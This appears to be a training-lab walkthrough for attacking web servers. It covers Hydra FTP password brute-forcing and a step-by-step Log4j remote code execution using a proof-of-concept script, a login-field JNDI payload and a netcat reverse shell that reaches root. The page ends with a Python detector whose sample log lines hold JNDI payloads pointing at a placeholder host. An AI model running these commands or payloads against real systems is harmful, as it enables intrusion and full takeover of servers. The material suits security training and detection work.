# 2. Perform Webserver attacks

## 1. Crack FTP credentials using Hydra

```
hydra -L users.txt -P passwords.txt ftp://192.168.18.2
```

{% embed url="<https://youtu.be/1tBbmUNyJoU>" %}

## 2. Gain Access to Target Web Server by Exploiting Log4j Vulnerability

### Install Docker

```
sudo apt-get update
sudo apt-get install docker.io 
```

### Build the docker Image

```
docker build -t log4j-shell-poc .
```

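> **-t**: tags the built image with the given name (here **log4j-shell-poc**). The trailing **.** is the build context, so run the command from the directory that contains the Dockerfile.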

<figure><img src="/files/Mpi018j8LBceM6MMIJGv" alt=""><figcaption></figcaption></figure>

### Start the vulnerable server

```
docker run --network host log4j-shell-poc
```

<figure><img src="/files/bVApIRVq0eqRaBXIzaCs" alt=""><figcaption></figcaption></figure>

### Exploitation

Scan the IP

```
nmap -sV -sC 10.10.1.9
```

<figure><img src="/files/Ru8Pkdh3zCtvZHYFFcee" alt=""><figcaption></figcaption></figure>

1. From the result, we can see that port **8080** is open and an **Apache Tomcat/Coyote 1.1** server is running on the target system.
2. Upon investigation, we can see that Apache is vulnerable to a Remote Code Execution (RCE) attack. Now we will use searchsploit to find the vulnerabilities pertaining to RCE attacks on the target server.
3. In the terminal window, run the **searchsploit -t Apache RCE** command to view the RCE vulnerabilities on the Apache server.

   ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/xi4z1ucr.jpg)
4. Now we need to select a vulnerability from the list to exploit the server. From the Nmap scan we found that the Apache Tomcat server is running on JSP, so we will target the Java vulnerabilities in the list.
5. We can see that the Java platform is vulnerable to the **Apache Log4j 2 - Remote Command Execution (RCE)** exploit.

   ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/v5ecobsb.jpg)
6. We will now exploit the Log4j vulnerability present in the target web server to perform remote code execution.
7. Click the **Firefox** icon at the top of **Desktop**, to open a browser window.
8. In the address bar of the browser, type **<http://10.10.1.9:8080>** and press **Enter**.

   ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/2ahufq2p.jpg)
9. We can observe that the Log4j vulnerable server is running on the **Ubuntu** machine. Leave **Firefox** and the website open.
10. Switch to the Terminal window, run **cd log4j-shell-poc/** and press **Enter** to enter the log4j-shell-poc directory.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/chl20mob.jpg)
11. Now we need to install JDK 8. To do that, open a new terminal window, type **sudo su** and press **Enter** to run the programs as the root user.

    > In the **\[sudo] password for attacker** field, type **toor** as a password and press **Enter**.
12. We need to extract the JDK archive file, which is already placed in the **/home/attacker** location.
13. Type **tar -xf jdk-8u202-linux-x64.tar.gz** and press **Enter**, to extract the file.

    > **-xf**: specifies extract all files.
14. Now we will move the **jdk1.8.0\_202** into **/usr/bin/**. To do that, type **mv jdk1.8.0\_202 /usr/bin/** and press **Enter**.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/1qsxhwek.jpg)
15. Now, we need to update the installed JDK path in the **poc.py** file.
16. Navigate to the previous terminal window. In the terminal, type **pluma poc.py** and press **Enter** to open **poc.py** file.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/hxicowut.jpg)
17. In the poc.py file scroll down and in line **62**, replace **jdk1.8.0\_20/bin/javac** with **/usr/bin/jdk1.8.0\_202/bin/javac**.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/ydcroaeb.jpg)
18. Scroll down to line **87** and replace **jdk1.8.0\_20/bin/java** with **/usr/bin/jdk1.8.0\_202/bin/java**.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/csfg3ry0.jpg)
19. Scroll down to line **99** and replace **jdk1.8.0\_20/bin/java** with **/usr/bin/jdk1.8.0\_202/bin/java**.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/aeoo24sn.jpg)
20. After making all the changes, **save** the file and close the **poc.py** editor window.
21. Now, open a new terminal window and type **nc -lvp 9001** and press **Enter**, to initiate a netcat listener as shown in screenshot.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/mbpaboet.jpg)
22. Switch to previous terminal window and type **python3 poc.py --userip 10.10.1.13 --webport 8000 --lport 9001** and press **Enter**, to start the exploitation and create payload.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/0h5avehw.jpg)
23. Now, copy the payload generated in the **send me**: section.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/bbnvnq3f.jpg)
24. Switch to **Firefox** browser window, in **Username** field paste the payload that was copied in previous step and in **Password** field type **password** and press **Login** button as shown in the screenshot.

    > In the **Password** field you can enter any password.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/b4whxnfp.jpg)
25. Now switch to the netcat listener; you can see that a reverse shell is opened.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/ynsg0jrp.jpg)
26. In the listener window type **pwd** and press **Enter**, to view the present working directory.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/uuftr5ii.jpg)
27. Now, type **whoami** and press **Enter**.

    ![](https://labondemand.blob.core.windows.net/content/lab168810/screens/1mhkqs3e.jpg)
28. We can see that we have shell access to the target web application as the root user.
29. The vulnerable Log4j library takes the payload as input and processes it; as a result, we obtain a reverse shell.
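From the defender's side, the payload pasted into the **Username** field in step 24 is visible in any log that records login attempts. The following is an added example, not part of the original lab or of the log4j-shell-poc project: it normalises URL-encoded values and flags lookup expressions in the user field. The log layout, the `src`/`user` field names, the addresses and the `callback.example` host are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)  # the lookup Log4Shell abuses
ANY_LOOKUP = re.compile(r"\$\{")                      # any ${...} expression at all
FIELD = re.compile(r"\bsrc=(\S+).*?\buser=(\S+)")     # assumed (constructed) log layout

def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so single- and double-encoded values are normalised."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return 'jndi-lookup', 'lookup-expression' or None for one field value."""
    text = decode_fully(value)
    if JNDI.search(text):
        return "jndi-lookup"
    # A login name never needs a ${...} expression, so flag those as well.
    if ANY_LOOKUP.search(text):
        return "lookup-expression"
    return None

def scan(lines):
    """Return (line_number, source_ip, verdict) for every flagged login line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = FIELD.search(line)
        if not match:
            continue
        verdict = classify(match.group(2))
        if verdict:
            hits.append((number, match.group(1), verdict))
    return hits

# Constructed sample records, not captured from the lab.
SAMPLE_LOG = [
    "2024-01-01T10:00:01Z src=192.0.2.10 event=login user=alice",
    "2024-01-01T10:00:05Z src=192.0.2.44 event=login user=${jndi:ldap://callback.example:1389/a}",
    "2024-01-01T10:00:09Z src=192.0.2.44 event=login user=%24%7BJNDI%3Aldap%3A%2F%2Fcallback.example%2Fa%7D",
    "2024-01-01T10:00:12Z src=192.0.2.44 event=login user=%2524%257Bjndi%253Aldap%253A%252F%252Fcallback.example%252Fa%257D",
    "2024-01-01T10:00:15Z src=192.0.2.51 event=login user=${date:yyyy}",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

String matching of this kind is a triage aid for logs and request fields; it does not replace patching the Log4j library on the server.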


